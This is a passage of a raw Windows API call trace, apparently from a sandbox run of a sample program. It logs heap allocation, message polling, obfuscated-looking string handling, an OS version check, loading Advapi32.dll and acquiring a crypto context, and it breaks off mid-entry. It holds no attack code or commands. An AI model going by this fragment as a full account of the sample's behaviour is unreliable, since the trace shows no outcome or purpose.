dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 0x9a3b80 [0107.085] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0107.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0107.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0107.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0107.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0107.087] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0107.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0107.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.128] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.128] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0107.128] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.128] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0107.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.129] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0107.129] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.129] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0107.129] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.129] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0107.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0107.130] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.130] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.130] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.130] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.130] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0107.130] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0107.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0107.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0107.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0107.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0107.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.131] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0107.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0107.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.131] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.131] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0107.132] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.132] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0107.132] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0107.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0107.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0107.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0107.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0107.132] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf330) returned 1 [0107.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.133] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0107.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.133] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0107.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.133] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0107.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.133] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0107.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.134] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0107.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.134] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0107.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.134] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0107.134] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.134] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0107.134] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.134] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.134] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.134] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0107.134] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: 